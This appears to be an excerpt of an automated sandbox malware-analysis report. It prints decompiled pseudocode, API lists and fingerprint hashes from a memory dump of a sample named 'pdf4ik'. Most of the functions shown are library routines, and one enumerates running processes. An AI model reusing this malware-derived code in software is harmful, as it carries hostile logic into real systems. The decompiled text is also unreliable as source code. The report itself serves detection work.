									L18:
									while(1) {
										if(_t38 >= 0) {
											_t39 = _t38 +  *((intOrPtr*)(_t66 + 0x144)) + 2;
										} else {
											_t39 = _t38 & 0x0000ffff;
										}
										_t40 = GetProcAddress(_t63, _t39);
										 *_t67 = _t40;
										if(_t40 == 0) {
											goto L28;
										} else {
											_t38 = _t52[2];
											_t52 =  &(_t52[2]);
											_t67 =  &(_t67[2]);
											if(_t38 != 0) {
												_t63 =  *(_t74 - 8);
												continue;
											} else {
												_t59 =  *((intOrPtr*)(_t74 - 4));
												goto L24;
											}
										}
										goto L29;
									}
								}
							} else {
								_t54 =  *_t59;
								if(_t54 == 0) {
									return 8;
								} else {
									_t52 = _t54 + _t37;
									goto L15;
								}
							}
						}
					}
					L29:
				}
				L28:
				return 6;
				goto L29;
			}





















                                        0x29d84b9b
                                        0x29d84b9b
                                        0x29d84b9b
                                        0x29d84ba0
                                        0x29d84ba0
                                        0x29d84bb2
                                        0x29d84bb4
                                        0x29d84bb9
                                        0x00000000
                                        0x00000000
                                        0x29d84bbf
                                        0x29d84bcb
                                        0x29d84c36
                                        0x00000000
                                        0x29d84bcd
                                        0x29d84bcf
                                        0x29d84bd5
                                        0x29d84bd1
                                        0x29d84bd1
                                        0x29d84bd1
                                        0x29d84be2
                                        0x29d84bed
                                        0x29d84bef
                                        0x29d84bf2
                                        0x29d84bf7
                                        0x29d84cc5
                                        0x29d84bfd
                                        0x29d84bfd
                                        0x29d84c05
                                        0x29d84c14
                                        0x29d84c19
                                        0x29d84c19
                                        0x29d84c23
                                        0x29d84c28
                                        0x29d84c2b
                                        0x29d84c2e
                                        0x29d84c39
                                        0x29d84c3f
                                        0x29d84c42
                                        0x29d84c45
                                        0x29d84c4e
                                        0x29d84c54
                                        0x29d84c5a
                                        0x29d84c5c
                                        0x29d84c66
                                        0x29d84c66
                                        0x29d84c6a
                                        0x29d84ca4
                                        0x29d84ca4
                                        0x29d84caa
                                        0x29d84caf
                                        0x00000000
                                        0x29d84cb5
                                        0x29d84cba
                                        0x29d84cba
                                        0x29d84c6c
                                        0x00000000
                                        0x29d84c73
                                        0x29d84c75
                                        0x29d84c82
                                        0x29d84c77
                                        0x29d84c77
                                        0x29d84c77
                                        0x29d84c88
                                        0x29d84c8e
                                        0x29d84c92
                                        0x00000000
                                        0x29d84c94
                                        0x29d84c94
                                        0x29d84c97
                                        0x29d84c9a
                                        0x29d84c9f
                                        0x29d84c70
                                        0x00000000
                                        0x29d84ca1
                                        0x29d84ca1
                                        0x00000000
                                        0x29d84ca1
                                        0x29d84c9f
                                        0x00000000
                                        0x29d84c92
                                        0x29d84c73
                                        0x29d84c5e
                                        0x29d84c5e
                                        0x29d84c62
                                        0x29d84cd0
                                        0x29d84c64
                                        0x29d84c64
                                        0x00000000
                                        0x29d84c64
                                        0x29d84c62
                                        0x29d84c5c
                                        0x29d84bf7
                                        0x00000000
                                        0x29d84bcb
                                        0x29d84cd1
                                        0x29d84cdb
                                        0x00000000

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc_free_malloc_memmove
                                        • String ID:
                                        • API String ID: 2200627730-0
                                        • Opcode ID: 70ea5f1bc721139ae5303620f47469c07b6a6aaf37212f15d066cb36ffd510d0
                                        • Instruction ID: c6e7b50ac616fd67eada69a28364b60cac86c014c24c31c618c87a329462a479
                                        • Opcode Fuzzy Hash: 70ea5f1bc721139ae5303620f47469c07b6a6aaf37212f15d066cb36ffd510d0
                                        • Instruction Fuzzy Hash: 97311EB1B01602EBD708CF69D984BA6B7A8BF44345F04816DDD0D9B706E735F923AB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DBBBBC Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E29DBBBBC(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x29dd702c, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x29dd7694 - _t7;
								if(__eflags == 0) {
									_t9 = E29DB2030(__eflags);
									 *_t9 = E29DB1FEE(GetLastError());
									goto L17;
								} else {
									__eflags = E29DB35CE(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E29DB2030(__eflags);
										 *_t12 = E29DB1FEE(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E29DB35CE(_t6, _t30);
						 *((intOrPtr*)(E29DB2030(__eflags))) = 0xc;
						goto L12;
					} else {
						E29DADFA6(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E29DADFE0(__edx, __edi, __esi, _a8);
				}
			}









                                        0x29dbbbc5
                                        0x29dbbbd2
                                        0x29dbbbd3
                                        0x29dbbbd6
                                        0x29dbbbd8
                                        0x29dbbbe7
                                        0x29dbbc1a
                                        0x29dbbc1a
                                        0x29dbbc1d
                                        0x00000000
                                        0x00000000
                                        0x29dbbbea
                                        0x29dbbbec
                                        0x29dbbbee
                                        0x29dbbbee
                                        0x29dbbbee
                                        0x29dbbbfb
                                        0x29dbbc01
                                        0x29dbbc03
                                        0x29dbbc05
                                        0x29dbbc65
                                        0x29dbbc65
                                        0x29dbbc07
                                        0x29dbbc07
                                        0x29dbbc0d
                                        0x29dbbc4f
                                        0x29dbbc63
                                        0x00000000
                                        0x29dbbc0f
                                        0x29dbbc16
                                        0x29dbbc18
                                        0x29dbbc37
                                        0x29dbbc4b
                                        0x29dbbc31
                                        0x29dbbc31
                                        0x29dbbc31
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbbc18
                                        0x29dbbc0d
                                        0x00000000
                                        0x29dbbc33
                                        0x29dbbc20
                                        0x29dbbc2b
                                        0x00000000
                                        0x29dbbbda
                                        0x29dbbbdd
                                        0x29dbbbe3
                                        0x29dbbbe3
                                        0x29dbbc34
                                        0x29dbbc36
                                        0x29dbbbc7
                                        0x29dbbbd1
                                        0x29dbbbd1

                                        APIs
                                        • _malloc.LIBCMT ref: 29DBBBCA
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • _free.LIBCMT ref: 29DBBBDD
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap_free_malloc
                                        • String ID:
                                        • API String ID: 1020059152-0
                                        • Opcode ID: a0daef754a05afac21696d82342fd0498f5253a031540e57f7c7682ec1edbbaf
                                        • Instruction ID: 0eb3a11bc48345ba11723193a7c2e018e4a442d4fca89ccf1ff039c40c34ea82
                                        • Opcode Fuzzy Hash: a0daef754a05afac21696d82342fd0498f5253a031540e57f7c7682ec1edbbaf
                                        • Instruction Fuzzy Hash: C8110433409605BBCB152E74E924E0A3799AF652A0B60C42EF94ACF950DE388543B3B0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D98930 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E29D98930(intOrPtr _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _t15;
				void* _t23;
				intOrPtr _t35;
				signed int _t37;
				void* _t38;
				void* _t39;

				_push(0xffffffff);
				_push(E29DC1B44);
				_push( *[fs:0x0]);
				_t15 =  *0x29dd5664; // 0xd9555f04
				_push(_t15 ^ _t37);
				 *[fs:0x0] =  &_v16;
				_t35 = _a4;
				_v8 = 4;
				E29DAD811(_t35);
				_t4 = _t35 + 0x1c; // 0xcccccccc
				_t19 =  *_t4;
				_t39 = _t38 + 4;
				if( *_t4 != 0) {
					E29DADFA6(_t19);
					_t39 = _t39 + 4;
				}
				 *((intOrPtr*)(_t35 + 0x1c)) = 0;
				_t6 = _t35 + 0x14; // 0xccc35de5
				_t20 =  *_t6;
				if( *_t6 != 0) {
					E29DADFA6(_t20);
					_t39 = _t39 + 4;
				}
				 *((intOrPtr*)(_t35 + 0x14)) = 0;
				_t8 = _t35 + 0xc; // 0x59000000
				_t21 =  *_t8;
				if( *_t8 != 0) {
					E29DADFA6(_t21);
					_t39 = _t39 + 4;
				}
				 *((intOrPtr*)(_t35 + 0xc)) = 0;
				_t10 = _t35 + 4; // 0xf44d8b00
				_t22 =  *_t10;
				if( *_t10 != 0) {
					E29DADFA6(_t22);
				}
				 *((intOrPtr*)(_t35 + 4)) = 0;
				_v8 = 0xffffffff;
				_t23 = E29DADA85(_t35);
				 *[fs:0x0] = _v16;
				return _t23;
			}











                                        0x29d98933
                                        0x29d98935
                                        0x29d98940
                                        0x29d98943
                                        0x29d9894a
                                        0x29d9894e
                                        0x29d98954
                                        0x29d98958
                                        0x29d9895f
                                        0x29d98964
                                        0x29d98964
                                        0x29d98969
                                        0x29d9896e
                                        0x29d98971
                                        0x29d98976
                                        0x29d98976
                                        0x29d98979
                                        0x29d9897c
                                        0x29d9897c
                                        0x29d98981
                                        0x29d98984
                                        0x29d98989
                                        0x29d98989
                                        0x29d9898c
                                        0x29d9898f
                                        0x29d9898f
                                        0x29d98994
                                        0x29d98997
                                        0x29d9899c
                                        0x29d9899c
                                        0x29d9899f
                                        0x29d989a2
                                        0x29d989a2
                                        0x29d989a7
                                        0x29d989aa
                                        0x29d989af
                                        0x29d989b4
                                        0x29d989b7
                                        0x29d989be
                                        0x29d989c6
                                        0x29d989d3

                                        APIs
                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 29D9895F
                                          • Part of subcall function 29DAD811: _setlocale.LIBCMT ref: 29DAD823
                                        • _free.LIBCMT ref: 29D98971
                                          • Part of subcall function 29DADFA6: HeapFree.KERNEL32(00000000,00000000,?,29DB523C,00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DADFBC
                                          • Part of subcall function 29DADFA6: GetLastError.KERNEL32(00000000,?,29DB523C,00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DADFCE
                                        • _free.LIBCMT ref: 29D98984
                                        • _free.LIBCMT ref: 29D98997
                                        • _free.LIBCMT ref: 29D989AA
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                        • String ID:
                                        • API String ID: 3515823920-0
                                        • Opcode ID: b186295af8a00476de76d94f7c2090fe568bc18a557c46718fda1e51deee29d0
                                        • Instruction ID: 4174f10eb5a8b904b65b103a0ac74cf0fcf49733395461b7eb035286342e9dac
                                        • Opcode Fuzzy Hash: b186295af8a00476de76d94f7c2090fe568bc18a557c46718fda1e51deee29d0
                                        • Instruction Fuzzy Hash: 7F1194F2900A40AFD710DF5DDC40A4BF7E9EF60B20F148A2ED515C3A40EA35E9159B62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA5230 Relevance: 7.6, APIs: 5, Instructions: 58processCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E29DA5230(intOrPtr _a4) {
				signed int _v12;
				char _v276;
				void* _v312;
				intOrPtr _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t11;
				void* _t21;
				intOrPtr _t23;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;
				void* _t32;

				_t11 =  *0x29dd5664; // 0xd9555f04
				_v12 = _t11 ^ _t31;
				_v316 = _a4;
				_t23 = 0;
				_v312 = 0x128;
				_t30 = CreateToolhelp32Snapshot(2, 0);
				if(Process32First(_t30,  &_v312) != 0) {
					_t29 = Process32Next;
					_t28 =  &_v312;
					while(Process32Next(_t30,  &_v312) != 0) {
						_t21 = E29DBD8D0(_t29, _t30,  &_v276, _v316);
						_t32 = _t32 + 8;
						if(_t21 == 0) {
							_t23 = 1;
						}
						_t28 =  &_v312;
					}
				}
				CloseHandle(_t30);
				return E29DADF46(_t23, _t23, _v12 ^ _t31, _t28, _t29, _t30);
			}

















                                        0x29da5239
                                        0x29da5240
                                        0x29da524d
                                        0x29da5253
                                        0x29da5255
                                        0x29da526b
                                        0x29da5277
                                        0x29da5279
                                        0x29da527f
                                        0x29da528b
                                        0x29da529e
                                        0x29da52a3
                                        0x29da52a8
                                        0x29da52aa
                                        0x29da52aa
                                        0x29da52ac
                                        0x29da52b6
                                        0x29da528b
                                        0x29da52bb
                                        0x29da52d3

                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 29DA525F
                                        • Process32First.KERNEL32(00000000,00000128), ref: 29DA526F
                                        • Process32Next.KERNEL32(00000000,00000128), ref: 29DA5287
                                        • Process32Next.KERNEL32(00000000,00000128), ref: 29DA52B4
                                        • CloseHandle.KERNEL32(00000000), ref: 29DA52BB
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 2284531361-0
                                        • Opcode ID: 0caca68a368f91eade9498cee74b60238e125ca7751958d4b6f405222a7dea30
                                        • Instruction ID: 067923598f1600f92999175270ad480ceabc7e1cf07b348d138a6598e1725a65
                                        • Opcode Fuzzy Hash: 0caca68a368f91eade9498cee74b60238e125ca7751958d4b6f405222a7dea30
                                        • Instruction Fuzzy Hash: 1111CE72A02219ABDB10EB64DD44FEE7778EF85340F008199E904DB240EB35AB46DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DB5022 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E29DB5022(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x29dd1d50);
				E29DB5A50(__ebx, __edi, __esi);
				_t28 = E29DB524B(__ebx, __edx, _t31);
				_t12 =  *0x29dd5b98; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E29DB60C0(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E29DB4FD5(_t29,  *0x29dd5de0);
					 *(_t30 - 4) = 0xfffffffe;
					E29DB508F();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E29DB524B(_t20, __edx, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E29DB3393(_t25, _t34);
				}
				return E29DB5A95(_t29);
			}








                                        0x29db5022
                                        0x29db5022
                                        0x29db5022
                                        0x29db5022
                                        0x29db5022
                                        0x29db5024
                                        0x29db5029
                                        0x29db5033
                                        0x29db5035
                                        0x29db503d
                                        0x29db5061
                                        0x29db5063
                                        0x29db5069
                                        0x29db5073
                                        0x29db507e
                                        0x29db5081
                                        0x29db5088
                                        0x29db503f
                                        0x29db503f
                                        0x29db5043
                                        0x00000000
                                        0x29db5045
                                        0x29db504a
                                        0x29db504a
                                        0x29db5043
                                        0x29db504d
                                        0x29db504f
                                        0x29db5051
                                        0x29db5053
                                        0x29db5058
                                        0x29db5060

                                        APIs
                                        • __getptd.LIBCMT ref: 29DB502E
                                          • Part of subcall function 29DB524B: __getptd_noexit.LIBCMT ref: 29DB524E
                                          • Part of subcall function 29DB524B: __amsg_exit.LIBCMT ref: 29DB525B
                                        • __getptd.LIBCMT ref: 29DB5045
                                        • __amsg_exit.LIBCMT ref: 29DB5053
                                        • __lock.LIBCMT ref: 29DB5063
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 29DB5077
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 938513278-0
                                        • Opcode ID: 498d22dfc2aadf04494e2c0c5681072b71bfe865cd3d8b2342fd9dd45b0331b2
                                        • Instruction ID: a6da2eaabfc035dbd84cc5bba52e7a9b20d88b812d64415587b3b560bbeee6b2
                                        • Opcode Fuzzy Hash: 498d22dfc2aadf04494e2c0c5681072b71bfe865cd3d8b2342fd9dd45b0331b2
                                        • Instruction Fuzzy Hash: 18F0B433901710ABEB15ABB49566B0D33A06F12720F11910DE247BFDC1CF285543FAB5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA70D0 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 492COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 85%
                                        			E29DA70D0(char __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v48;
				intOrPtr _v56;
				char _v76;
				void* _v80;
				char _v81;
				char _v82;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				short _v99;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr* _v116;
				char _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				char _v132;
				void* _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t222;
				signed int _t223;
				intOrPtr* _t226;
				signed int _t228;
				intOrPtr _t232;
				intOrPtr* _t233;
				intOrPtr _t236;
				char* _t237;
				void* _t241;
				signed int _t243;
				void* _t244;
				void* _t245;
				intOrPtr* _t248;
				intOrPtr* _t250;
				intOrPtr* _t264;
				intOrPtr* _t266;
				intOrPtr* _t269;
				intOrPtr* _t273;
				intOrPtr* _t275;
				intOrPtr* _t280;
				intOrPtr* _t283;
				intOrPtr* _t286;
				intOrPtr* _t290;
				intOrPtr* _t292;
				char* _t293;
				char* _t305;
				intOrPtr _t307;
				intOrPtr _t309;
				signed int _t316;
				intOrPtr* _t322;
				intOrPtr _t326;
				intOrPtr* _t336;
				intOrPtr _t347;
				intOrPtr _t348;
				char* _t364;
				char* _t391;
				intOrPtr _t392;
				intOrPtr _t396;
				intOrPtr _t419;
				intOrPtr* _t426;
				intOrPtr _t427;
				intOrPtr _t431;
				intOrPtr _t444;
				intOrPtr _t447;
				void* _t448;
				void* _t449;
				intOrPtr _t450;
				void* _t453;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				void* _t463;
				void* _t464;
				void* _t466;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t471;
				intOrPtr _t497;

				_push(0xffffffff);
				_push(E29DC232B);
				_push( *[fs:0x0]);
				_t464 = _t463 - 0x7c;
				_t222 =  *0x29dd5664; // 0xd9555f04
				_t223 = _t222 ^ _t462;
				_v20 = _t223;
				_push(_t223);
				 *[fs:0x0] =  &_v16;
				_t322 = _a12;
				_v82 = __ecx;
				_v104 = __edx;
				_v112 = _a16;
				_v124 = _a8;
				_v80 = _t322;
				_v96 = _a20;
				_v88 = _a24;
				_t226 = E29D98E50(_a8, _a24,  &_v136);
				_v8 = 0;
				_t426 = E29DA7E20(_t226);
				_v8 = 0xffffffff;
				_t228 = _v136;
				_v116 = _t426;
				if(_t228 != 0) {
					_t457 = _t228;
					_v108 = _t457;
					E29DADA5D( &_v92, 0);
					_t316 =  *(_t457 + 4);
					if(_t316 != 0 && _t316 < 0xffffffff) {
						 *(_t457 + 4) = _t316 - 1;
					}
					asm("sbb esi, esi");
					E29DADA85( &_v92);
					_t461 =  !( ~( *(_t457 + 4))) & _v108;
					if(_t461 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t461))))(1);
					}
				}
				E29DA7CA0(_t426,  &_v76);
				_v8 = 1;
				_v81 =  *((intOrPtr*)( *((intOrPtr*)( *_t426 + 8))))();
				_v28 = 0xf;
				_v32 = 0;
				_v48 = 0;
				_v8 = 2;
				_t232 =  *_t322;
				if(_t232 == 0x2b) {
					L8:
					_v108 = 1;
					goto L9;
				} else {
					_v108 = 0;
					_t480 = _t232 - 0x2d;
					if(_t232 != 0x2d) {
						L9:
						_t233 = E29DAFCBE(_t426, 1, _t480);
						_t444 = _v88;
						_v100 =  *((intOrPtr*)( *_t233));
						_v99 = 0x65;
						_v92 = E29DAEB70(_t322, 0x65, _t444);
						_t236 = E29DAEB70(_t322, _v100, _t444);
						_t427 = _t236;
						_t466 = _t464 + 0x18;
						_v128 = _t427;
						if(_t427 == 0) {
							_v96 = _t236;
						}
						_t347 = _v56;
						_t391 = _v76;
						_t237 = _t391;
						if(_t347 < 0x10) {
							_t237 =  &_v76;
						}
						if( *_t237 == 0x7f) {
							L39:
							_t392 = _v124;
							_t348 =  *((intOrPtr*)(_t392 + 0x20));
							_t241 = _v96 + _t444 + _v112 + _v104;
							_t497 =  *((intOrPtr*)(_t392 + 0x24));
							if(_t497 < 0 || _t497 <= 0 && _t348 == 0 || _t348 <= _t241) {
								_v92 = 0;
								_t428 = _v92;
							} else {
								_t428 = _t348 - _t241;
								_v92 = _t348 - _t241;
							}
							_t243 =  *(_t392 + 0x14) & 0x000001c0;
							if(_t243 != 0x40) {
								if(_t243 == 0x100) {
									__eflags = _v108;
									if(_v108 > 0) {
										_t290 = E29DA7960(1, _t322,  &_v132, _a28, _a32);
										_t466 = _t466 + 0xc;
										_a28 =  *_t290;
										_t450 = _t444 - 1;
										__eflags = _t450;
										_a32 =  *((intOrPtr*)(_t290 + 4));
										_v80 = _t322 + 1;
										_v88 = _t450;
									}
									_t286 = E29DA79D0(_t428, _v82,  &_v132, _a28, _a32);
									_a28 =  *_t286;
									_a32 =  *((intOrPtr*)(_t286 + 4));
								} else {
									_t292 = E29DA79D0(_t428, _v82,  &_v132, _a28, _a32);
									_a28 =  *_t292;
									_a32 =  *((intOrPtr*)(_t292 + 4));
								}
								_t444 = _v88;
								_t322 = _v80;
								_v92 = 0;
								_t466 = _t466 + 8;
							}
							_t244 = E29DAEB70(_t322, _v100, _t444);
							_t467 = _t466 + 0xc;
							if(_t244 != 0) {
								_t127 = _t244 - _t322 + 1; // 0x1
								_t449 = _t127;
								_t130 = _t449 - 1; // 0x0
								_t273 = E29DA7BD0(_v80, _v81,  &_v132, _t130, _a28, _a32);
								_a28 =  *_t273;
								_a32 =  *((intOrPtr*)(_t273 + 4));
								_t275 = E29DA79D0(_v104, 0x30,  &_v132,  *_t273,  *((intOrPtr*)(_t273 + 4)));
								_a28 =  *_t275;
								_a32 =  *((intOrPtr*)(_t275 + 4));
								_t280 = E29DA79D0(1,  *((intOrPtr*)( *((intOrPtr*)( *_v116 + 4))))(),  &_v120, _a28, _a32);
								_a28 =  *_t280;
								_a32 =  *((intOrPtr*)(_t280 + 4));
								_t283 = E29DA79D0(_v112, 0x30,  &_v120,  *_t280,  *((intOrPtr*)(_t280 + 4)));
								_v80 = _v80 + _t449;
								_t322 = _v80;
								_t467 = _t467 + 0x28;
								_v88 = _v88 - _t449;
								_t444 = _v88;
								_a28 =  *_t283;
								_a32 =  *((intOrPtr*)(_t283 + 4));
							}
							_t245 = E29DAEB70(_t322, 0x65, _t444);
							_t468 = _t467 + 0xc;
							if(_t245 != 0) {
								_t163 = _t245 - _t322 + 1; // 0x1
								_t448 = _t163;
								_t165 = _t448 - 1; // 0x0
								_t264 = E29DA7BD0(_v80, _v81,  &_v120, _t165, _a28, _a32);
								_a28 =  *_t264;
								_a32 =  *((intOrPtr*)(_t264 + 4));
								_t266 = E29DA79D0(_v96, 0x30,  &_v120,  *_t264,  *((intOrPtr*)(_t264 + 4)));
								_a28 =  *_t266;
								_t471 = _t468 + 0x18;
								_a32 =  *((intOrPtr*)(_t266 + 4));
								_v96 = 0;
								_t364 = "E";
								if(( *(_v124 + 0x14) & 0x00000004) == 0) {
									_t364 = "e";
								}
								_t269 = E29DA7960(1, _t364,  &_v120,  *_t266,  *((intOrPtr*)(_t266 + 4)));
								_v80 = _v80 + _t448;
								_t468 = _t471 + 0xc;
								_v88 = _v88 - _t448;
								_t444 = _v88;
								_a28 =  *_t269;
								_a32 =  *((intOrPtr*)(_t269 + 4));
							}
							_t248 = E29DA7BD0(_v80, _v81,  &_v120, _t444, _a28, _a32);
							_a28 =  *_t248;
							_a32 =  *((intOrPtr*)(_t248 + 4));
							_t250 = E29DA79D0(_v96, 0x30,  &_v120,  *_t248,  *((intOrPtr*)(_t248 + 4)));
							_t396 = _v124;
							_t430 = _a4;
							_a28 =  *_t250;
							_a32 =  *((intOrPtr*)(_t250 + 4));
							 *((intOrPtr*)(_t396 + 0x20)) = 0;
							 *((intOrPtr*)(_t396 + 0x24)) = 0;
							E29DA79D0(_v92, _v82, _a4,  *_t250,  *((intOrPtr*)(_t250 + 4)));
							_t469 = _t468 + 0x20;
							if(_v28 >= 0x10) {
								_push(_v48);
								E29DADF3B();
								_t469 = _t469 + 4;
							}
							_v28 = 0xf;
							_v32 = 0;
							_v48 = 0;
							if(_v56 >= 0x10) {
								_push(_v76);
								E29DADF3B();
							}
							 *[fs:0x0] = _v16;
							_pop(_t431);
							_pop(_t447);
							_pop(_t326);
							return E29DADF46(_t430, _t326, _v20 ^ _t462, _t396, _t431, _t447);
						} else {
							_t293 = _t391;
							if(_t347 < 0x10) {
								_t293 =  &_v76;
							}
							if( *_t293 <= 0) {
								goto L39;
							} else {
								_t381 =  &_v48;
								E29D95540(_t322,  &_v48, _t444);
								if(_v92 != 0) {
									__eflags = _t427;
									if(_t427 == 0) {
										E29D957D0(_v104,  &_v48,  &_v48, 0x30);
										_t322 = _v80;
										_v104 = _t427;
									}
									_t381 = _v96;
									__eflags = _v92 - _t322;
									E29DA6F10(_v92 - _t322, _t391,  &_v48, _v96, 0x30);
									_t427 = _v128;
								} else {
									E29D957D0(_v96,  &_v48,  &_v48, 0x30);
									_t322 = _v80;
								}
								_push(0x30);
								if(_t427 != 0) {
									__eflags = _t427 - _t322;
									_push(_v112);
									E29DA6F10(_t427 - _t322 + 1, _v112,  &_v48);
									E29DA6F10(_t427 - _t322, _v112,  &_v48, _v104, 0x30);
									_v112 = 0;
								} else {
									E29D957D0(_v104, _t381,  &_v48);
								}
								_t336 = _v76;
								_v104 = 0;
								if(_v56 < 0x10) {
									_t336 =  &_v76;
								}
								_t305 = _v48;
								if(_v28 < 0x10) {
									_t305 =  &_v48;
								}
								_t453 = E29DAFD20( &_v100, _t305,  &_v100);
								_t307 =  *_t336;
								_t466 = _t466 + 8;
								if(_t307 == 0x7f) {
									L35:
									if(_v28 < 0x10) {
										_v80 =  &_v48;
									} else {
										_v80 = _v48;
									}
									_t419 = _v32;
									_t322 = _v80;
									_v96 = 0;
									_v88 = _t419;
									_t444 = _t419;
									goto L39;
								} else {
									while(_t307 > 0) {
										_t421 = _t453 - _v108;
										_t309 = _t307;
										if(_t309 >= _t453 - _v108) {
											goto L35;
										}
										_t453 = _t453 - _t309;
										E29DA6F10(_t453, _t421,  &_v48, 1, 0);
										if( *((char*)(_t336 + 1)) > 0) {
											_t336 = _t336 + 1;
										}
										_t307 =  *_t336;
										if(_t307 != 0x7f) {
											continue;
										} else {
											goto L35;
										}
									}
									goto L35;
								}
							}
						}
					}
					goto L8;
				}
			}


























































































                                        0x29da70d3
                                        0x29da70d5
                                        0x29da70e0
                                        0x29da70e1
                                        0x29da70e4
                                        0x29da70e9
                                        0x29da70eb
                                        0x29da70f1
                                        0x29da70f5
                                        0x29da70fe
                                        0x29da7101
                                        0x29da7107
                                        0x29da710d
                                        0x29da7119
                                        0x29da711c
                                        0x29da711f
                                        0x29da7122
                                        0x29da7125
